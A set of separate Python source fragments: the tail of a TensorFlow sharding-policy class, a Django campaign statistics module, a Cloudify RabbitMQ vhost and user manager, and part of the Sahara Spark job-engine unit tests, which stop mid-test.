    return self._number_of_shards

  def set_number_of_shards(self, number_of_shards):
    """Sets the number of shards for the current policy.

    If the policy has been frozen then number_of_shards must match the
    existing setting.

    Args:
      number_of_shards: The number of shards to use in the policy.

    Raises:
      ValueError: If the policy has been frozen and number_of_shards
        differs from the frozen value; or number_of_shards <= 0.
    """
    if self._frozen:
      # Frozen: only a no-op "set" to the same value is allowed.
      if self._number_of_shards != number_of_shards:
        raise ValueError(
            "Can't set sharding policy to use %d shards since it has been "
            "frozen to use %d." % (number_of_shards, self._number_of_shards))
    else:
      if number_of_shards > 0:
        self._number_of_shards = number_of_shards
      else:
        raise ValueError(
            "Can't set sharding policy to use %s shards; value must be >0" %
            str(number_of_shards))

  @property
  def shard_dimension(self):
    """Returns the shard dimension of the policy or None if unspecified."""
    return self._shard_dimension

  def set_shard_dimension(self, shard_dimension):
    """Sets the shard dimension for the current policy.

    If the policy has been frozen then shard_dimension must match the
    existing setting.

    Args:
      shard_dimension: The shard dimension to use in the policy.

    Raises:
      ValueError: If the policy has been frozen and shard_dimension
        differs from the frozen value, or shard_dimension can't be
        interpreted as a Dimension.
    """
    if self._frozen:
      # Frozen: only a no-op "set" to the same value is allowed.
      if self._shard_dimension != shard_dimension:
        raise ValueError(
            "Can't set shard dimension to %d since it has been frozen to "
            "use %d." % (shard_dimension, self._shard_dimension))
    else:
      self._shard_dimension = tensor_shape.as_dimension(shard_dimension)

  def merge(self, other):
    """Merges the policy of another policy into the current policy.

    Only values that are set on `other` are merged in; unset values are
    left untouched.

    Args:
      other: The policy to merge into this one.

    Raises:
      ValueError: If this policy has been frozen and the merge conflicts with
      the frozen policy.
    """
    if other.number_of_shards is not None:
      self.set_number_of_shards(other.number_of_shards)
    if other.shard_dimension is not None:
      self.set_shard_dimension(other.shard_dimension)

  def get_sharded_shape(self, shape, shard_index=None):
    """Returns the shape of a shard of a full Tensor.

    When given the shape of a 'full-size' Tensor, returns the shape of
    the sub-Tensor after it has been sharded.  Returns None if either
    number_of_shards or shard_dimension is still unset (this method does
    NOT freeze the policy or fill in defaults).

    Args:
      shape: The shape of the full-size Tensor to be sharded.
      shard_index: The index of the shard whose shape should be returned.
        shard_index can be None for sharding policies that use the same
        shape for every shard.

    Returns:
      The shape of the sharded version of the Tensor.

    Raises:
      ValueError: If shard_index is None when shards are of different
        shapes; or shard_index is not None and
        !(0<=shard_index<number_of_shards); or shape does not have at
        least self.shard_dimension+1 dimensions; or the value of
        shape's shard dimension is not a multiple of
        self.number_of_shards
    """
    if self._shard_dimension is None or self._number_of_shards is None:
      # Don't raise an error if the config is unset.
      return None
    if shard_index is not None:
      if shard_index < 0 or shard_index >= self.number_of_shards:
        raise ValueError("shard_index %d, but must be in [0,%d)." %
                         (shard_index, self._number_of_shards))
    shape = tensor_shape.as_shape(shape)
    if self._number_of_shards == 1:
      # Don't do anything when there's only one shard.
      return shape
    ndims = shape.ndims
    if ndims is None:
      raise ValueError("shape must be a specified shape not Unknown")
    if ndims <= self._shard_dimension:
      raise ValueError("shape %s does not contain shard_dimension %d" %
                       (shape.as_list(), self._shard_dimension))
    dims = shape.as_list()
    if dims[self._shard_dimension] is None:
      raise ValueError("shape %s must have a fixed size for dimension %d "
                       "that is known at graph construction time." %
                       (shape.as_list(), self._shard_dimension))
    if (dims[self._shard_dimension] % self._number_of_shards) != 0:
      raise ValueError("shape %s cannot be sharded %d ways along dimension %d" %
                       (shape.as_list(), self._number_of_shards,
                        self._shard_dimension))
    # Floor division is exact here thanks to the divisibility check above.
    dims[self._shard_dimension] //= self._number_of_shards
    return tensor_shape.as_shape(dims)

  def _unshard_shape(self, shape):
    """Return the unsharded shape that would generate a given sharded shape.

    Args:
      shape: the sharded shape to unshard

    Returns:
      The unsharded shape.

    Raises:
      ValueError: if shape is unknown or does not contain
        self.shard_dimension
      TypeError: if shape is not convertible to a TensorShape
    """
    shape = tensor_shape.as_shape(shape)
    if self._number_of_shards == 1:
      # Don't do anything when there's only one shard.
      return shape
    ndims = shape.ndims
    if ndims is None:
      raise ValueError("shape must be a specified shape not Unknown")
    if ndims <= self._shard_dimension:
      raise ValueError("shape %s does not contain shard_dimension %d" %
                       (shape.as_list(), self._shard_dimension))
    dims = shape.as_list()
    # Inverse of get_sharded_shape: scale the shard dimension back up.
    dims[self._shard_dimension] *= self._number_of_shards
    return tensor_shape.as_shape(dims)

  def get_unsharded_shape(self, shapes):
    """Returns the shape of an unsharded Tensor given a list of shards.

    When given a list of shapes of shards, returns the shape of the
    unsharded Tensor that would generate the shards. Sets defaults for the
    policy if number_of_shards or shard_dimension is None.

    Args:
      shapes: The shapes of the Tensor shards to be combined.

    Returns:
      The shape of the unsharded version of the Tensor.

    Raises:
      ValueError: if shapes is not a list of length
        self.number_of_shards; or any element of shapes is not a valid
        shape consistent with the sharding policy; or the list of
        shapes is not a valid sharding of a full shape.
      TypeError: if an element of shapes is not convertible to a
        TensorShape
    """
    self._fill_default_values()
    if len(shapes) != self.number_of_shards:
      raise ValueError(
          "shapes is %s but must be a list of length number_of_shards=%d" % (
              str(shapes), self.number_of_shards))
    unsharded_shapes = [self._unshard_shape(s) for s in shapes]
    # Every shard must unshard to a shape compatible with the last one's.
    for i in xrange(self.number_of_shards - 1):
      if not unsharded_shapes[i].is_compatible_with(
          unsharded_shapes[self.number_of_shards - 1]):
        raise ValueError(
            "sharded shapes %s are not consistent shards of a full shape "
            "sharded %d ways along dimension %d" % (
                str(shapes), self.number_of_shards, self.shard_dimension))
    return unsharded_shapes[0]
| |
from itertools import groupby
from restapi.serializers import UserSerializer, CampaignSerializer, TaskSerializer
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from rest_framework.test import APIRequestFactory
from tasks import models
# TODO
def page_link(page):
    """Return the identifier used for *page* in API responses.

    Currently just the page number (the TODO above suggests this may later
    become a richer link, e.g. a URL).

    :param page: a Django ``Page`` object
    """
    return page.number
def next_page_or_none(page):
    """Return the next page number for *page*, or None when on the last page.

    :param page: a Django ``Page`` object
    """
    if not page.has_next():
        return None
    # BUG FIX: page.next_page_number() returns an int, but page_link()
    # expects a Page object (it reads .number), so page_link(int) raised
    # AttributeError whenever a next page existed.  The number *is* the
    # link value, so return it directly.
    return page.next_page_number()
def previous_page_or_none(page):
    """Return the previous page number for *page*, or None on the first page.

    :param page: a Django ``Page`` object
    """
    if not page.has_previous():
        return None
    # BUG FIX: page.previous_page_number() returns an int, but page_link()
    # expects a Page object (it reads .number), so page_link(int) raised
    # AttributeError whenever a previous page existed.  Return the number
    # directly.
    return page.previous_page_number()
def mean(nums):
    """Arithmetic mean of *nums* as a float (``nums`` must be non-empty)."""
    total = float(sum(nums))
    return total / len(nums)
def stats_per_user_single_period(form):
    """Build per-user task-completion stats for a campaign (single period).

    :param form: form exposing ``parse_campaign()``
    :return: dict with the serialized campaign, per-user rows sorted by
        descending score, per-task columns, and pagination metadata
    """
    entries = models.Entry.objects.all()
    # TODO determine period
    campaign = form.parse_campaign()
    tasks = [ct.task for ct in campaign.campaigntask_set.all()]
    # BUG FIX: itertools.groupby only groups *consecutive* items, so the
    # entries must be sorted by the grouping key first (as the multi-period
    # variant already does); otherwise a user whose entries were interleaved
    # with other users' kept only their last consecutive run of entries.
    entries_per_user = {
        k: list(v)
        for k, v in groupby(sorted(entries, key=lambda x: x.user.pk),
                            lambda x: x.user)
    }
    # TODO is there a better way?
    context = {
        'request': APIRequestFactory().get('/')
    }

    def create_stats(user, entries):
        # One 0/1 flag per campaign task: did this user complete it?
        tasks_by_user = set([x.task for x in entries])
        stats = [[0, 1][task in tasks_by_user] for task in tasks]
        serialized_user = UserSerializer(user, context=context).data
        return {
            'user': serialized_user,
            'score': mean(stats),
            'stats': stats
        }

    rows = [create_stats(user, entries) for user, entries in entries_per_user.items()]
    rows.sort(key=lambda stat: stat['score'], reverse=True)
    # Note: another way to paginate is using Link headers like GitHub API:
    # https://developer.github.com/v3/#pagination
    paginator = Paginator(rows, 20)  # TODO add pagesize param to form
    pagenum = 1  # TODO add page param to form
    try:
        page = paginator.page(pagenum)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        page = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999),
        # deliver last page of results.
        page = paginator.page(paginator.num_pages)
    columns = [TaskSerializer(task, context=context).data for task in tasks]
    return {
        'campaign': CampaignSerializer(campaign, context=context).data,
        'rows': rows,
        'columns': columns,
        'page': {
            'count': paginator.count,
            'next': next_page_or_none(page),
            'prev': previous_page_or_none(page),
            'first': page_link(paginator.page(1)),
            'last': page_link(paginator.page(paginator.num_pages)),
        },
    }
def calculate_period(campaign, entry):
    """Return the 1-based period index of *entry* within *campaign*.

    Entries created on the campaign start date fall into period 1; each
    subsequent ``campaign.period_days`` days begin a new period.
    """
    days_elapsed = (entry.created_at.date() - campaign.start).days
    return days_elapsed // campaign.period_days + 1
def calculate_periods(campaign, entries):
    """Return the campaign's period indexes in descending order.

    Implements the previous TODO ("periods should be complete set from
    campaign start to last entry"): covers period 1 through the period of
    the latest entry.  Returns an empty list when there are no entries.

    :param campaign: campaign with ``start`` and ``period_days``
    :param entries: iterable of entries with ``created_at``
    """
    last_period = max(
        (calculate_period(campaign, entry) for entry in entries), default=0)
    # Descending to match the previous hard-coded placeholder [3, 2, 1].
    return list(range(last_period, 0, -1))
def stats_per_user_multi_period(form):
    """Build per-user task-completion stats for every campaign period.

    :param form: form exposing ``parse_campaign()``
    :return: dict with the serialized campaign, per-user rows sorted by
        descending score, per-period columns, and pagination metadata
    """
    entries = models.Entry.objects.all()
    campaign = form.parse_campaign()
    tasks = [ct.task for ct in campaign.campaigntask_set.all()]
    # Annotate each entry with its 1-based period index.
    for entry in entries:
        entry.period = calculate_period(campaign, entry)
    periods = calculate_periods(campaign, entries)
    entries_per_user = {k: list(v) for k, v in groupby(sorted(entries, key=lambda x: x.user.pk), lambda x: x.user)}
    # TODO is there a better way?
    context = {
        'request': APIRequestFactory().get('/')
    }

    def create_stats(user, entries):
        # BUG FIX: groupby requires input sorted by the grouping key; the
        # user's entries arrive sorted by user, not by period, so duplicate
        # period keys could occur and the dict comprehension kept only the
        # last consecutive run, under-counting completions.
        tasks_per_period = {
            k: len(list(v)) / len(tasks)
            for k, v in groupby(sorted(entries, key=lambda x: x.period),
                                lambda x: x.period)
        }

        def score(period):
            if period in tasks_per_period:
                return tasks_per_period[period]
            return 0

        stats = [score(period) for period in periods]
        serialized_user = UserSerializer(user, context=context).data
        return {
            'user': serialized_user,
            'score': mean(stats),
            'stats': stats
        }

    rows = [create_stats(user, entries) for user, entries in entries_per_user.items()]
    rows.sort(key=lambda stat: stat['score'], reverse=True)
    # Note: another way to paginate is using Link headers like GitHub API:
    # https://developer.github.com/v3/#pagination
    paginator = Paginator(rows, 20)  # TODO add pagesize param to form
    pagenum = 1  # TODO add page param to form
    try:
        page = paginator.page(pagenum)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        page = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999),
        # deliver last page of results.
        page = paginator.page(paginator.num_pages)
    columns = periods
    return {
        'campaign': CampaignSerializer(campaign, context=context).data,
        'rows': rows,
        'columns': columns,
        'page': {
            'count': paginator.count,
            'next': next_page_or_none(page),
            'prev': previous_page_or_none(page),
            'first': page_link(paginator.page(1)),
            'last': page_link(paginator.page(paginator.num_pages)),
        },
    }
def stats_per_group_single_period(form):
    """Build per-group task-completion stats for one campaign period.

    :param form: form exposing ``parse_campaign()``
    :return: dict with the serialized campaign, per-group rows sorted by
        descending score, per-task columns, and pagination metadata
    """
    campaign = form.parse_campaign()
    tasks = [ct.task for ct in campaign.campaigntask_set.all()]
    # TODO should get from params
    period = 1
    # Keep only the entries that fall into the selected period.
    entries = []
    for entry in models.Entry.objects.all():
        entry.period = calculate_period(campaign, entry)
        if entry.period == period:
            entries.append(entry)
    # NOTE(review): x.user.groups.first() returns None for a user with no
    # group, which would raise AttributeError on .pk here -- confirm all
    # participating users belong to a group.
    entries_per_group = {k: list(v) for k, v in groupby(sorted(entries, key=lambda x: x.user.groups.first().pk), lambda x: x.user.groups.first())}
    # TODO is there a better way?
    context = {
        'request': APIRequestFactory().get('/')
    }

    def create_stats(group, entries):
        # TODO should be all users in group, not just in the completed entries
        users_count = len(set([entry.user for entry in entries]))
        # Number of completing entries per task (input pre-sorted for groupby).
        count_per_task = {k: len(list(v)) for k, v in groupby(sorted(entries, key=lambda x: x.task.pk), lambda x: x.task)}
        stats = []
        for task in tasks:
            if task in count_per_task:
                # Fraction of this group's active users who completed the task.
                score = count_per_task[task] / users_count
            else:
                score = 0
            stats.append(score)
        # TODO create and use GroupSerializer
        serialized_group = group.name
        return {
            'group': serialized_group,
            'score': mean(stats),
            'stats': stats
        }

    rows = [create_stats(group, entries) for group, entries in entries_per_group.items()]
    rows.sort(key=lambda stat: stat['score'], reverse=True)
    # Note: another way to paginate is using Link headers like GitHub API:
    # https://developer.github.com/v3/#pagination
    paginator = Paginator(rows, 20)  # TODO add pagesize param to form
    pagenum = 1  # TODO add page param to form
    try:
        page = paginator.page(pagenum)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        page = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999),
        # deliver last page of results.
        page = paginator.page(paginator.num_pages)
    columns = [TaskSerializer(task, context=context).data for task in tasks]
    return {
        'campaign': CampaignSerializer(campaign, context=context).data,
        'rows': rows,
        'columns': columns,
        'page': {
            'count': paginator.count,
            'next': next_page_or_none(page),
            'prev': previous_page_or_none(page),
            'first': page_link(paginator.page(1)),
            'last': page_link(paginator.page(paginator.num_pages)),
        },
    }
| |
########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from requests.exceptions import HTTPError
from functools import wraps
from cloudify.models_states import AgentState
from cloudify.utils import generate_user_password
from cloudify.cryptography_utils import encrypt, decrypt
from cloudify.rabbitmq_client import RabbitMQClient, USERNAME_PATTERN
from manager_rest.storage import get_storage_manager
from manager_rest.storage.models import Tenant, Agent
def ignore_not_found(func):
    """Decorator that suppresses HTTP 404 errors raised by *func*.

    Any other :class:`HTTPError` (or any non-HTTP exception) propagates
    unchanged.

    FIX: the wrapper now propagates func's return value instead of always
    discarding it; callers previously received None even on success.
    Returns None when a 404 was suppressed.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except HTTPError as e:
            if e.response.status_code != 404:
                raise
            # 404 means the resource is already gone -- nothing to do.
    return wrapper
# NOTE(review): not referenced in this module's visible code; presumably the
# TLS-enabled RabbitMQ management HTTP API port -- confirm against callers.
RABBITMQ_MANAGEMENT_PORT = 15671
class AMQPManager(object):
    """Keeps RabbitMQ vhosts and users in sync with manager tenants/agents."""

    # Template for per-tenant vhost names; filled with the tenant name.
    VHOST_NAME_PATTERN = 'rabbitmq_vhost_{0}'

    def __init__(self, host, username, password, **request_kwargs):
        """Create a RabbitMQ management client and a storage manager handle.

        :param host: RabbitMQ management API host
        :param username: management API username
        :param password: management API password
        :param request_kwargs: extra keyword args passed to RabbitMQClient
        """
        self._client = RabbitMQClient(host, username, password,
                                      **request_kwargs)
        self._storage_manager = get_storage_manager()

    def create_tenant_vhost_and_user(self, tenant):
        """
        Create a new RabbitMQ vhost and user, and grant the user permissions
        on the vhost

        :param tenant: An SQLAlchemy Tenant object
        :return: The updated tenant object
        """
        username, encrypted_password = self._create_rabbitmq_user(tenant)
        # Reuse the vhost name already recorded on the tenant, if any.
        vhost = tenant.rabbitmq_vhost or \
            self.VHOST_NAME_PATTERN.format(tenant.name)
        self._client.create_vhost(vhost)
        # Full permissions (configure/write/read) on the tenant's own vhost.
        self._client.set_vhost_permissions(vhost, username, '.*', '.*', '.*')
        # Gives configure and write permissions to the specific exchanges of
        # events, logs and monitoring. The exchange cloudify-events-topic
        # is the new events exchange and cloudify-events permissions are being
        # kept for old agents upgrades.
        allowed_resources = '^cloudify-(events-topic|events|logs|monitoring)$'
        self._client.set_vhost_permissions('/',
                                           username,
                                           configure=allowed_resources,
                                           write=allowed_resources)
        tenant.rabbitmq_vhost = vhost
        tenant.rabbitmq_username = username
        tenant.rabbitmq_password = encrypted_password
        return tenant

    def create_agent_user(self, agent):
        """
        Create a new RabbitMQ user, and grant the user permissions

        :param agent: An SQLAlchemy Agent object
        :return: The updated agent object
        """
        username, encrypted_password = self._create_rabbitmq_user(agent)
        self._set_agent_rabbitmq_user_permissions(username,
                                                  agent.rabbitmq_exchange,
                                                  agent.tenant.rabbitmq_vhost)
        agent.rabbitmq_username = username
        agent.rabbitmq_password = encrypted_password
        return agent

    def sync_metadata(self):
        """Synchronize database tenants with rabbitmq metadata"""
        tenants = self._storage_manager.list(Tenant, get_all_results=True)
        agents = self._storage_manager.list(Agent, get_all_results=True)
        # Remove stale rabbitmq state first, then recreate anything missing.
        self._clear_extra_vhosts(tenants)
        self._clear_extra_users(tenants, agents)
        self._add_missing_vhosts_and_users(tenants, agents)

    def _create_rabbitmq_user(self, resource):
        """Create (or re-create) the rabbitmq user for a tenant/agent and
        return ``(username, encrypted_password)``.

        If the resource already carries credentials they are reused (the
        stored password is decrypted before being sent to rabbitmq);
        otherwise a new password is generated and its encrypted form is
        returned for storage.
        """
        username = resource.rabbitmq_username or \
            USERNAME_PATTERN.format(resource.name)
        # The password is being stored encrypted in the DB
        new_password = generate_user_password()
        password = decrypt(resource.rabbitmq_password) \
            if resource.rabbitmq_password else new_password
        encrypted_password = resource.rabbitmq_password or \
            encrypt(new_password)
        self._client.create_user(username, password)
        return username, encrypted_password

    def _add_missing_vhosts_and_users(self, tenants, agents):
        """Create vhosts and users present in the database"""
        for tenant in tenants:
            updated_tenant = self.create_tenant_vhost_and_user(tenant)
            self._storage_manager.update(updated_tenant)
        for agent in agents:
            # Restored agents keep their previous credentials; skip them.
            if agent.state != AgentState.RESTORED:
                updated_agent = self.create_agent_user(agent)
                self._storage_manager.update(updated_agent)

    def _clear_extra_vhosts(self, tenants):
        """Remove vhosts in rabbitmq not present in the database"""
        expected_vhosts = set(
            tenant.rabbitmq_vhost
            for tenant in tenants
            if tenant.rabbitmq_vhost  # Ignore None values
        )
        # [:-3] strips the '{0}' placeholder, leaving the fixed name prefix.
        current_vhosts = set(
            vhost
            for vhost in self._client.get_vhost_names()
            if vhost.startswith(self.VHOST_NAME_PATTERN[:-3])
        )
        extra_vhosts = current_vhosts - expected_vhosts
        for vhost in extra_vhosts:
            self._client.delete_vhost(vhost)

    def _clear_extra_users(self, tenants, agents):
        """Remove users in rabbitmq not present in the database"""
        expected_usernames = self._get_rabbitmq_users(tenants).union(
            self._get_rabbitmq_users(agents))
        # [:-3] strips the '{0}' placeholder, leaving the fixed name prefix.
        current_usernames = set(
            user['name']
            for user in self._client.get_users()
            if user['name'].startswith(USERNAME_PATTERN[:-3])
        )
        extra_usernames = current_usernames - expected_usernames
        for username in extra_usernames:
            self._client.delete_user(username)

    def _get_rabbitmq_users(self, resources):
        # Collect the rabbitmq usernames recorded on tenants/agents.
        return set(
            resource.rabbitmq_username
            for resource in resources
            if resource.rabbitmq_username  # Ignore None values
        )

    @ignore_not_found
    def _delete_vhost(self, vhost):
        # 404 (vhost already gone) is ignored via the decorator.
        self._client.delete_vhost(vhost)

    @ignore_not_found
    def _delete_user(self, username):
        # 404 (user already gone) is ignored via the decorator.
        self._client.delete_user(username)

    def remove_tenant_vhost_and_user(self, tenant_name):
        """ Delete the vhost and user associated with a tenant name """
        vhost = self.VHOST_NAME_PATTERN.format(tenant_name)
        username = USERNAME_PATTERN.format(tenant_name)
        self._delete_vhost(vhost)
        self._delete_user(username)

    def _set_agent_rabbitmq_user_permissions(self,
                                             username,
                                             exchange,
                                             tenant_vhost):
        # Gives the user permissions only to these resources in the tenant
        # vhost:
        # 1. The agent's exchange
        # 2. The agent's queues (for receiving tasks and sending responses)
        # 3. The exchanges of events, logs and monitoring
        allowed_resources = '^(cloudify-(events-topic|logs|monitoring)|' \
                            '{exchange}($|_(operation|workflow|service|' \
                            'response_.*))$)'.format(exchange=exchange)
        self._client.set_vhost_permissions(tenant_vhost,
                                           username,
                                           configure=allowed_resources,
                                           write=allowed_resources,
                                           read=allowed_resources)
        # Gives configure and write permissions to the specific exchanges of
        # events, logs and monitoring in the root vhost
        allowed_resources = '^cloudify-(events-topic|logs|monitoring)$'
        self._client.set_vhost_permissions('/',
                                           username,
                                           configure=allowed_resources,
                                           write=allowed_resources)
| |
# Copyright (c) 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
import sahara.exceptions as ex
from sahara.service.edp.spark import engine as se
from sahara.tests.unit import base
from sahara.utils import edp
class TestSpark(base.SaharaTestCase):
    def setUp(self):
        """Shared fixture values for the Spark job-engine tests."""
        super(TestSpark, self).setUp()
        self.master_host = "master"
        self.master_port = 7077
        self.master_inst = "6789"
        self.spark_pid = "12345"
        self.spark_home = "/opt/spark"
        self.workflow_dir = "/wfdir"
        self.driver_cp = "/usr/lib/hadoop/hadoop-swift.jar"
def test_get_pid_and_inst_id(self):
'''Test parsing of job ids
Test that job ids of the form pid@instance are
split into pid and instance ids by eng._get_pid_and_inst_id()
but anything else returns empty strings
'''
eng = se.SparkJobEngine(None)
for job_id in [None, "", "@", "something", "pid@", "@instance"]:
pid, inst_id = eng._get_pid_and_inst_id(job_id)
self.assertEqual(("", ""), (pid, inst_id))
pid, inst_id = eng._get_pid_and_inst_id("pid@instance")
self.assertEqual(("pid", "instance"), (pid, inst_id))
    @mock.patch('sahara.utils.general.get_instances')
    def test_get_instance_if_running(self, get_instances):
        '''Test retrieval of pid and instance object for running job

        If the job id is valid and the job status is non-terminated,
        _get_instance_if_running() should retrieve the instance
        based on the inst_id and return the pid and instance.

        If the job is invalid or the job is terminated, it should
        return None, None.

        If get_instances() throws an exception or returns an empty list,
        the instance returned should be None (pid might still be set)
        '''
        get_instances.return_value = ["instance"]
        job_exec = mock.Mock()
        eng = se.SparkJobEngine("cluster")

        # Malformed job id -> (None, None)
        job_exec.oozie_job_id = "invalid id"
        self.assertEqual((None, None),
                         eng._get_instance_if_running(job_exec))

        # Valid job id but terminated status -> (None, None)
        job_exec.oozie_job_id = "pid@inst_id"
        for state in edp.JOB_STATUSES_TERMINATED:
            job_exec.info = {'status': state}
            self.assertEqual((None, None),
                             eng._get_instance_if_running(job_exec))

        # Valid job id, running status -> pid and the looked-up instance
        job_exec.info = {'status': edp.JOB_STATUS_RUNNING}
        self.assertEqual(("pid", "instance"),
                         eng._get_instance_if_running(job_exec))
        get_instances.assert_called_with("cluster", ["inst_id"])

        # Pretend get_instances returns nothing
        get_instances.return_value = []
        pid, instance = eng._get_instance_if_running(job_exec)
        self.assertIsNone(instance)

        # Pretend get_instances throws an exception
        get_instances.side_effect = Exception("some failure")
        pid, instance = eng._get_instance_if_running(job_exec)
        self.assertIsNone(instance)
    def test_get_result_file(self):
        """_get_result_file cats the job's result file over the remote and
        returns the (exit_code, stdout) pair from execute_command."""
        remote = mock.Mock()
        remote.execute_command.return_value = 999, "value"

        job_exec = mock.Mock()
        job_exec.extra = {"spark-path": "/tmp/spark-edp/Job/123"}

        eng = se.SparkJobEngine("cluster")
        ret, stdout = eng._get_result_file(remote, job_exec)
        # raise_when_error=False: a missing result file must not raise here
        remote.execute_command.assert_called_with(
            "cat /tmp/spark-edp/Job/123/result",
            raise_when_error=False)
        self.assertEqual((ret, stdout),
                         remote.execute_command.return_value)
def test_check_pid(self):
remote = mock.Mock()
remote.execute_command.return_value = 999, ""
eng = se.SparkJobEngine("cluster")
ret = eng._check_pid(remote, "pid")
remote.execute_command.assert_called_with("ps hp pid",
raise_when_error=False)
self.assertEqual(999, ret)
    @mock.patch.object(se.SparkJobEngine,
                       '_get_result_file',
                       autospec=True)
    @mock.patch.object(se.SparkJobEngine,
                       '_check_pid',
                       autospec=True)
    def test_get_job_status_from_remote(self, _check_pid, _get_result_file):
        '''Test retrieval of job status from remote instance

        If the process is present, status is RUNNING
        If the process is not present, status depends on the result file
        If the result file is missing, status is DONEWITHERROR
        '''
        eng = se.SparkJobEngine("cluster")
        job_exec = mock.Mock()
        remote = mock.Mock()

        # Pretend process is running (ps exit code 0)
        _check_pid.return_value = 0
        status = eng._get_job_status_from_remote(remote, "pid", job_exec)
        _check_pid.assert_called_with(eng, remote, "pid")
        self.assertEqual({"status": edp.JOB_STATUS_RUNNING}, status)

        # Pretend process ended and result file contains 0 (success)
        _check_pid.return_value = 1
        _get_result_file.return_value = 0, "0"
        status = eng._get_job_status_from_remote(remote, "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_SUCCEEDED}, status)

        # Pretend process ended and result file contains 1 (error exit)
        _get_result_file.return_value = 0, "1"
        status = eng._get_job_status_from_remote(remote, "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_DONEWITHERROR}, status)

        # Pretend process ended and result file contains 130 (killed)
        _get_result_file.return_value = 0, "130"
        status = eng._get_job_status_from_remote(remote, "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_KILLED}, status)

        # Pretend process ended and result file contains -2 (killed)
        _get_result_file.return_value = 0, "-2"
        status = eng._get_job_status_from_remote(remote, "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_KILLED}, status)

        # Pretend process ended and result file is missing (cat failed)
        _get_result_file.return_value = 1, ""
        status = eng._get_job_status_from_remote(remote, "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_DONEWITHERROR}, status)
    @mock.patch.object(se.SparkJobEngine,
                       '_get_job_status_from_remote',
                       autospec=True)
    @mock.patch.object(se.SparkJobEngine,
                       '_get_instance_if_running',
                       autospec=True)
    @mock.patch('sahara.utils.remote.get_remote')
    def test_get_job_status(self,
                            get_remote,
                            _get_instance_if_running,
                            _get_job_status_from_remote):
        '''Test get_job_status()

        Returns None when no instance is running, otherwise relays the
        value reported by _get_job_status_from_remote().
        '''
        # This is to mock "with remote.get_remote(instance) as r"
        remote_instance = mock.Mock()
        get_remote.return_value.__enter__ = mock.Mock(
            return_value=remote_instance)
        # Pretend instance is not returned
        _get_instance_if_running.return_value = "pid", None
        job_exec = mock.Mock()
        eng = se.SparkJobEngine("cluster")
        status = eng.get_job_status(job_exec)
        self.assertIsNone(status)
        # Pretend we have an instance
        _get_instance_if_running.return_value = "pid", "instance"
        _get_job_status_from_remote.return_value = {"status":
                                                    edp.JOB_STATUS_RUNNING}
        status = eng.get_job_status(job_exec)
        _get_job_status_from_remote.assert_called_with(eng,
                                                       remote_instance,
                                                       "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_RUNNING}, status)
@mock.patch.object(se.SparkJobEngine,
'_get_instance_if_running',
autospec=True,
return_value=(None, None))
@mock.patch('sahara.utils.remote.get_remote')
def test_cancel_job_null_or_done(self,
get_remote,
_get_instance_if_running):
'''Test cancel_job() when instance is None
Test that cancel_job() returns None and does not try to
retrieve a remote instance if _get_instance_if_running() returns None
'''
eng = se.SparkJobEngine("cluster")
job_exec = mock.Mock()
self.assertIsNone(eng.cancel_job(job_exec))
self.assertTrue(_get_instance_if_running.called)
self.assertFalse(get_remote.called)
    @mock.patch.object(se.SparkJobEngine,
                       '_get_job_status_from_remote',
                       autospec=True,
                       return_value={"status": edp.JOB_STATUS_KILLED})
    @mock.patch.object(se.SparkJobEngine,
                       '_get_instance_if_running',
                       autospec=True,
                       return_value=("pid", "instance"))
    @mock.patch('sahara.utils.remote.get_remote')
    def test_cancel_job(self,
                        get_remote,
                        _get_instance_if_running,
                        _get_job_status_from_remote):
        '''Test cancel_job() with a valid instance

        For a valid instance, test that cancel_job:
        * retrieves the remote instance
        * executes the proper kill command
        * retrieves the job status (because the remote command is successful)
        '''
        # This is to mock "with remote.get_remote(instance) as r" in cancel_job
        # and to mock r.execute_command to return success (exit code 0)
        remote_instance = mock.Mock()
        get_remote.return_value.__enter__ = mock.Mock(
            return_value=remote_instance)
        remote_instance.execute_command.return_value = (0, "standard out")
        eng = se.SparkJobEngine("cluster")
        job_exec = mock.Mock()
        status = eng.cancel_job(job_exec)
        # check that remote.get_remote was called with the result of
        # eng._get_instance_if_running()
        get_remote.assert_called_with("instance")
        # check that execute_command was called with the proper arguments
        # ("pid" was passed in)
        remote_instance.execute_command.assert_called_with(
            "kill -SIGINT pid",
            raise_when_error=False)
        # check that the job status was retrieved since the command succeeded
        _get_job_status_from_remote.assert_called_with(eng,
                                                       remote_instance,
                                                       "pid", job_exec)
        self.assertEqual({"status": edp.JOB_STATUS_KILLED}, status)
    @mock.patch.object(se.SparkJobEngine,
                       '_get_job_status_from_remote',
                       autospec=True)
    @mock.patch.object(se.SparkJobEngine,
                       '_get_instance_if_running',
                       autospec=True,
                       return_value=("pid", "instance"))
    @mock.patch('sahara.utils.remote.get_remote')
    def test_cancel_job_failed(self,
                               get_remote,
                               _get_instance_if_running,
                               _get_job_status_from_remote):
        '''Test cancel_job() when remote command fails

        For a valid instance and a failed kill command, test that cancel_job:
